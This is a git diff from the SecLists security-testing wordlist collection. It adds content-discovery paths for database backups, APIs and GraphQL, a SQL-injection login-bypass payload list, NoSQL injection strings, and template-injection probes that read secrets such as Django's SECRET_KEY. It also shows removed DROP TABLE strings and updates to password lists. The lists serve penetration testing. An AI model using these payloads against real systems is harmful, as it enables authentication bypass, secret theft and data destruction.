Merge branch 'master' of https://github.com/cbk914/SecLists

2024-08-15 05:40:33 +03:00 · 2020-09-30 16:37:47 +02:00 · 2020-09-30 16:37:47 +02:00 · ae8aabcfed
commit ae8aabcfed
parent e06aacd937 b66822b6e7
14 changed files with 1738795 additions and 515445 deletions
--- a/Discovery/Web-Content/Common-DB-Backups.txt
+++ b/Discovery/Web-Content/Common-DB-Backups.txt
@ -323,3 +323,14 @@
 /web.sql.gz
 /dbadmin.rar
 /site.sql.tar
+/accounts.sql
+/back.sql
+/backups.sql
+/clients.sql
+/customers.sql
+/data.sql
+/database.sql
+/database.sqlite
+/setup.sql
+/sqldump.sql
+/localhost.sql
--- a/Discovery/Web-Content/api/common_paths.txt
+++ b/Discovery/Web-Content/api/common_paths.txt
@ -31,5 +31,13 @@
 /api/v1/history/history
 /api/v1/monitoring/accounts
 /api/v1/monitoring/address-check
+/api/v1/swagger.json
+/api/v2/accounts
+/api/v2/users
+/api/v2/spans
+/api/v2/jobs
+/api/v2/tickets
+/api/v2/swagger.json
+/api/v4/projects
 /swagger/
 /api-docs/v1/openapi.json
--- a/Discovery/Web-Content/graphql.txt
+++ b/Discovery/Web-Content/graphql.txt
@ -1,12 +1,90 @@
-graphql
-graphql.php
-graphql/console
-graphql/schema.json
-graphql/schema.yaml
-graphql/schema.xml
+altair
+explorer
 graphiql
+graphiql.css
+graphiql/finland
+graphiql.js
 graphiql.min.css
 graphiql.min.js
-graphiql.css
-graphiql.js
+graphiql.php
+graphql
+graphql/console
+graphql-explorer
+graphql.php
+graphql/schema.json
+graphql/schema.xml
+graphql/schema.yaml
+playground
 subscriptions
+v1/altair
+v1/explorer
+v1/graphiql
+v1/graphiql.css
+v1/graphiql/finland
+v1/graphiql.js
+v1/graphiql.min.css
+v1/graphiql.min.js
+v1/graphiql.php
+v1/graphql
+v1/graphql/console
+v1/graphql-explorer
+v1/graphql.php
+v1/graphql/schema.json
+v1/graphql/schema.xml
+v1/graphql/schema.yaml
+v1/playground
+v1/subscriptions
+v2/altair
+v2/explorer
+v2/graphiql
+v2/graphiql.css
+v2/graphiql/finland
+v2/graphiql.js
+v2/graphiql.min.css
+v2/graphiql.min.js
+v2/graphiql.php
+v2/graphql
+v2/graphql/console
+v2/graphql-explorer
+v2/graphql.php
+v2/graphql/schema.json
+v2/graphql/schema.xml
+v2/graphql/schema.yaml
+v2/playground
+v2/subscriptions
+v3/altair
+v3/explorer
+v3/graphiql
+v3/graphiql.css
+v3/graphiql/finland
+v3/graphiql.js
+v3/graphiql.min.css
+v3/graphiql.min.js
+v3/graphiql.php
+v3/graphql
+v3/graphql/console
+v3/graphql-explorer
+v3/graphql.php
+v3/graphql/schema.json
+v3/graphql/schema.xml
+v3/graphql/schema.yaml
+v3/playground
+v3/subscriptions
+v3/altair
+v3/explorer
+v3/graphiql
+v3/graphiql.css
+v3/graphiql/finland
+v3/graphiql.js
+v3/graphiql.min.css
+v3/graphiql.min.js
+v3/graphiql.php
+v3/graphql
+v3/graphql/console
+v3/graphql-explorer
+v3/graphql.php
+v3/graphql/schema.json
+v3/graphql/schema.xml
+v3/graphql/schema.yaml
+v3/playground
+v3/subscriptions
--- a/Discovery/Web-Content/raft-large-directories.txt
+++ b/Discovery/Web-Content/raft-large-directories.txt
@ -7235,6 +7235,14 @@ your
 98
 emailpopup
 family-notices
+order-pay
+order-received
+add-payment-method
+delete-payment-method
+set-default-payment-method
+edit-account
+edit-address
+customer-logout
 fuseaction
 katsushikaku
 sumidaku
--- a/Discovery/Web-Content/swagger.txt
+++ b/Discovery/Web-Content/swagger.txt
@ -4,6 +4,7 @@
 /swagger-resources
 /swagger/static/index.html
 /swagger-ui/swagger.json
+/swagger/ui/index
 /apidocs/swagger.json
 /api-docs/swagger.json
 /swagger-ui
@ -11,39 +12,39 @@
 /apidocs
 /swagger
 /v1/swagger.json
-api/apidocs
-api/v1/apidocs
-api/v2/apidocs
-api/api-docs
-api/v1/api-docs
-api/v2/api-docs
-swagger
-swagger/
-swagger.json
-swagger-ui
-swagger-ui.html
-swagger-ui.json
-swagger.yml
-api/swagger
-api/swagger/
-api/swagger.json
-api/swagger-ui
-api/swagger-ui.html
-api/swagger-ui.json
-api/v1/swagger
-api/v1/swagger/
-api/v1/swagger.json
-api/v1/swagger-ui
-api/v1/swagger-ui.html
-api/v1/swagger-ui.json
-api/v2/swagger
-api/v2/swagger/
-api/v2/swagger.json
-api/v2/swagger-ui
-api/v2/swagger-ui.html
-api/v2/swagger-ui.json
-graphql
-api
-api/v1/
-api/v2
-api/v3
+/api/apidocs
+/api/v1/apidocs
+/api/v2/apidocs
+/api/api-docs
+/api/v1/api-docs
+/api/v2/api-docs
+/swagger
+/swagger/
+/swagger.json
+/swagger-ui
+/swagger-ui.html
+/swagger-ui.json
+/swagger.yml
+/api/swagger
+/api/swagger/
+/api/swagger.json
+/api/swagger-ui
+/api/swagger-ui.html
+/api/swagger-ui.json
+/api/v1/swagger
+/api/v1/swagger/
+/api/v1/swagger.json
+/api/v1/swagger-ui
+/api/v1/swagger-ui.html
+/api/v1/swagger-ui.json
+/api/v2/swagger
+/api/v2/swagger/
+/api/v2/swagger.json
+/api/v2/swagger-ui
+/api/v2/swagger-ui.html
+/api/v2/swagger-ui.json
+/graphql
+/api
+/api/v1/
+/api/v2
+/api/v3
--- a/Fuzzing/Databases/NoSQL.txt
+++ b/Fuzzing/Databases/NoSQL.txt
@ -9,6 +9,7 @@ $where: '1 == 1'
 db.injection.insert({success:1});
 db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
 || 1==1
+' || 'a'=='a
 ' && this.password.match(/.*/)//+%00
 ' && this.passwordzz.match(/.*/)//+%00
 '%20%26%26%20this.password.match(/.*/)//+%00
--- a/Fuzzing/SQLi/quick-SQLi.txt
+++ b/Fuzzing/SQLi/quick-SQLi.txt
@ -0,0 +1,77 @@
+'-'
+' '
+'&'
+'^'
+'*'
+' or ''-'
+' or '' '
+' or ''&'
+' or ''^'
+' or ''*'
+"-"
+" "
+"&"
+"^"
+"*"
+" or ""-"
+" or "" "
+" or ""&"
+" or ""^"
+" or ""*"
+or true--
+" or true--
+' or true--
+") or true--
+') or true--
+' or 'x'='x
+') or ('x')=('x
+')) or (('x'))=(('x
+" or "x"="x
+") or ("x")=("x
+")) or (("x"))=(("x
+or 1=1
+or 1=1-- 
+or 1=1#
+or 1=1/*
+admin' --
+admin' #
+admin'/*
+admin' or '1'='1
+admin' or '1'='1'--
+admin' or '1'='1'#
+admin' or '1'='1'/*
+admin'or 1=1 or ''='
+admin' or 1=1
+admin' or 1=1--
+admin' or 1=1#
+admin' or 1=1/*
+admin') or ('1'='1
+admin') or ('1'='1'--
+admin') or ('1'='1'#
+admin') or ('1'='1'/*
+admin') or '1'='1
+admin') or '1'='1'--
+admin') or '1'='1'#
+admin') or '1'='1'/*
+1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
+admin" --
+admin" #
+admin"/*
+admin" or "1"="1
+admin" or "1"="1"--
+admin" or "1"="1"#
+admin" or "1"="1"/*
+admin"or 1=1 or ""="
+admin" or 1=1
+admin" or 1=1--
+admin" or 1=1#
+admin" or 1=1/*
+admin") or ("1"="1
+admin") or ("1"="1"--
+admin") or ("1"="1"#
+admin") or ("1"="1"/*
+admin") or "1"="1
+admin") or "1"="1"--
+admin") or "1"="1"#
+admin") or "1"="1"/*
+1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
--- a/Fuzzing/XSS/XSS-OFJAAAH.txt
+++ b/Fuzzing/XSS/XSS-OFJAAAH.txt
--- a/Fuzzing/big-list-of-naughty-strings.txt
+++ b/Fuzzing/big-list-of-naughty-strings.txt
@ -543,8 +543,8 @@ http://a/%%30%30
 #
 #	Strings which can cause a SQL injection if inputs are not sanitized

-1;DROP TABLE users
-1'; DROP TABLE users-- 1
+1; SELECT 1
+1'; SELECT 1-- 1
 ' OR 1=1 -- 1
 ' OR '1'='1

--- a/Fuzzing/template-engines-expression.txt
+++ b/Fuzzing/template-engines-expression.txt
@ -7,3 +7,5 @@ ${42*42}
 <%=42*42 %>
 {{=42*42}}
 {^xyzm42}1764{/xyzm42}
+${donotexists|42*42}
+[[${42*42}]]
--- a/Fuzzing/template-engines-special-vars.txt
+++ b/Fuzzing/template-engines-special-vars.txt
@ -0,0 +1,78 @@
+# The objective of this dictionary is to help to discover the template engine used
+# once a evaluation of a template expression was detected via the following dictionary:
+# https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-expression.txt
+# Special variables are grouped by template engine in order to facilitate the identification.
+# Use the term between the expression syntax identified as evaluated like "{{ xxx }}" for example.
+# 
+# Indicate to your fuzzer to ignore a line starting with: "# " (space is important)
+# You can also filter the dictionary before to use it via the command: grep -v "# " > dict.txt
+# 
+# Sources:
+# https://portswigger.net/research/server-side-template-injection
+# https://github.com/epinna/tplmap
+# Custom personal labs
+# 
+# GENERIC: To cause an error and perhaps get technical information
+1/0
+# FREEMARKER (JAVA)
+# https://freemarker.apache.org/docs/ref_specvar.html
+.version
+.current_template_name
+.locale_object
+# JINJA2 (PYTHON)
+# https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
+# https://stackoverflow.com/a/40346872/451455
+self._TemplateReference__context
+# DJANGO (PYTHON)
+# https://docs.djangoproject.com/en/3.1/ref/settings/
+settings
+settings.DEBUG
+settings.DATABASES
+settings.SECRET_KEY
+# PUG (NODEJS)
+# https://pugjs.org
+# In case of hit then use "Object.keys(VAR_NAME)" to explore the object properties
+# Self object is available if the "self" options is set to true
+self
+# Payload below are more NodeJS related
+locals
+global
+# ERB (RUBY)
+# https://ruby-doc.org/stdlib-2.7.1/libdoc/erb/rdoc/ERB.html
+ERB.version()
+# TORNADO (PYTHON)
+# https://www.tornadoweb.org/en/stable/template.html
+# Presence of variables with a name starting with "_tt_" indicate usage of Tornado
+locals()
+globals()
+# TWIG (PHP)
+# https://twig.symfony.com/doc/3.x/
+_self
+_self.getTemplateName().__toString
+_context
+_context|length
+_context|keys|first
+constant('Twig_Environment::VERSION')
+constant('Twig_Environment::VERSION_ID')
+constant('Twig_Environment::EXTRA_VERSION')
+# VELOCITY (JAVA)
+# http://velocity.apache.org/tools/devel/generic.html
+$context.keys
+$context.TOOLS_VERSION
+$field.in("org.apache.velocity.runtime.VelocityEngineVersion")
+$field.in("org.apache.velocity.runtime.RuntimeConstants")
+# THYMELEAF (JAVA)
+# https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#variables
+# https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#execution-info
+#execInfo
+#execInfo.templateStack
+#execInfo.templateStack[0].getClass.forName("org.thymeleaf.Thymeleaf").getField("VERSION").get(null)
+execInfo
+execInfo.templateStack
+execInfo.templateStack[0].getClass.forName("org.thymeleaf.Thymeleaf").getField("VERSION").get(null)
+# SMARTY (PHP)
+# https://www.smarty.net/docs/en/language.syntax.variables.tpl
+# https://www.smarty.net/docs/en/language.variables.smarty.tpl#language.variables.smarty.config
+$smarty.version
+$smarty.config
+$smarty.template
--- a/Miscellaneous/lang-german.txt
+++ b/Miscellaneous/lang-german.txt
--- a/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
+++ b/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
@ -306496,6 +306496,7 @@ gosupes
 Gosu2002
 gostosas
 gostop
+gosto
 gostiva
 gossimer
 gossett
@ -415198,7 +415199,6 @@ souza1
 sOuXin
 souwest
 souvien22
-gosto
 souuaicr
 souto
 southwood1
@ -506891,6 +506891,7 @@ legally
 Legalize
 legalise
 legal123
+lega
 leg522
 leg0las
 leftys
@ -879412,7 +879413,6 @@ xmanjadas
 xmanifestox
 xmango12
 xmanfan
-lega
 xmandrad
 xmandc
 xmandate
@ -952660,7 +952660,6 @@ WddFKa
 Wddcbri2
 wdday1
 WDDaXuqvWXcJ
-j
 WdDAukDK
 WDd96Q
 wdd7rezl
--- a/Passwords/german_misc.txt
+++ b/Passwords/german_misc.txt
@ -0,0 +1,262 @@
+Pandemie
+T-Zellen
+Mund-Nasen-Schutz
+Mundnasenschutz
+Atemmasken
+FFP3
+FFP2
+Abstandsregel
+Maskenpflicht
+Schulöffnungen
+Schulschließung
+Schulschließungen
+Kitaschließungen
+Kitaschließung
+Covidioten
+Qanon
+Klimakrise
+Treibhausgas
+UN-Klimakonferenz
+IPCC-Bericht
+IPCC-Sonderbericht
+Klimaabkommen
+Braunkohleförderung
+Steinkohleförderung
+Wallbox
+Corona-Leugner
+Coronakrise
+Corona-Krise
+Corona-Infektion
+Aluhutträger
+Hildmann
+AfD-Wähler
+CSU-Wähler
+CDU-Wähler
+SPD-Wähler
+EU-Kommission
+Respektrente
+Flüchtlingskrise
+Flüchtlingslager
+Seawatch3
+Seawatch4
+Abschiebe-Industrie
+Klickzahl
+Low Carb
+Schmähgedicht
+tindern
+verpeilen
+SARS
+MERS
+SARS-CoV2
+SARS-CoV-2
+Covid
+Corona-Virus
+Drohnenangriff
+Hoheitsgewässer
+Feedbackschleifen
+Plagiatsaffäre
+guttenbergen
+Wirecard
+Vollhonk
+Vollhupe
+Rollerchaos
+E-Roller
+Fridays for Future
+Klimahysterie
+Alternative Fakten
+Ankerzentren
+Grexit
+Heißzeit
+Funklochrepublik
+Lichtgrenze
+Schwarze Null
+Rote Null
+Götzseidank
+Lügenpresse
+Abwrackprämie
+postfaktisch
+Gutmensch
+Herdprämie
+Wutbürger
+GroKo
+Arschfax
+I bims
+rumoxidieren
+merkeln
+Bankster
+Deepfake
+OK Boomer
+Mütterrente
+Achtsamkeitsübung
+Alltagsrassismus
+Austrittsabkommen
+Balayage
+Baraberer
+Bartöl
+batteln
+bienenfreundlich
+Binge-Watching
+Bonpflicht
+Brexiteer
+Brexiteerin
+Cebiche
+Ceviche
+Chatgruppe
+Chiasame
+Chiasamen
+cisgender
+cloudbasiert
+coden
+Concealer
+Covid-19
+Craftbeer
+Darter
+Darterin
+Datenschutzgrundverordnung
+Datingplattform
+debuggen
+Dieselaffäre
+Digitalpakt
+Dislike
+Disruption
+doodeln
+downcyceln
+durchtakten
+Dystopie
+Einlaufkind
+Elektroscooter
+Elterntaxi
+empathiefrei
+Enkeltag
+Erinnerungskultur
+Erklärvideo
+Facebook-Gruppe
+Facharzttermin
+Faktenfinder
+Faktenfinderin
+Faszienrolle
+Flugscham
+fracken
+Fridays for Future
+Funfact
+Gänsehautmoment
+Geisterspiel
+Gelbweste
+gendergerecht
+Gendersternchen
+glyphosathaltig
+Grooming
+Hanfzigarette
+Hasskommentar
+Hatespeech
+helikoptern
+Herdenimmunität
+Herzensprojekt
+hypen
+Influencer
+Influencerin
+inklusiv
+Insektensterben
+ixen
+Katzenvideo
+Kaufprämie
+Kinesiotape
+Klimanotstand
+Kryptowährung
+Ladesäule
+leaken
+Lifehack
+Lockdown
+Männerdutt
+Masernimpfung
+Matchatee
+Mikroplastik
+Muttizettel
+Netflixserie
+nice
+Nudging
+offensivstark
+Onlinevoting
+pansexuell
+pestizidfrei
+Pfandbecher
+Pflegeroboter
+plastikfrei
+Plug-in-Hybrid
+preppen
+Prepper
+Prepperin
+rechtsterroristisch
+rekuperieren
+Repaircafé
+Reproduktionszahl
+ressourceneffizient
+sachgrundlos
+Schummelsoftware
+schwurbeln
+Sexting
+Shishabar
+skalierbar
+Social Distancing
+spoilern
+Störerhaftung
+Telemedizin
+textsicher
+ticcen
+Tiny House
+transgender
+Unterarmstütz
+unverhandelbar
+Unverpacktladen
+Uploadfilter
+usselig
+veräußerbar
+verpeilt
+versiffen
+Videobeweis
+vintage
+Whatsapp-Gruppe
+Wiesn
+Wildpinkler
+Wohlfühlmodus
+zivilgesellschaftlich
+Zustellbett
+Zwinkersmiley
+Aufgebotsschein
+Bäckerjunge
+beweiben
+Blindenanstalt
+dahier
+danieden
+dawiderreden
+erschrecklich
+erstlich
+Fernsprechanschluss
+Freiersmann
+Grillenhaftigkeit
+Hackenporsche
+hiedurch
+Hochzeitsbitter
+irrwerden
+Jägersmann
+Jungfernkranz
+Kabelnachricht
+Kammerjungfer
+Kammerjunker
+Kebsehe
+Lehrmädchen
+mannbar
+Murrkopf
+Niethose
+Pfarrherr
+Rätterwäsche
+Rechtsgelehrsamkeit
+saugrob
+Schlafgänger
+Schlupfjacke
+Schnürleibchen
+Standesehre
+Tressenrock
+Vorführdame
+Wolfsrachen
+Zehrpfennig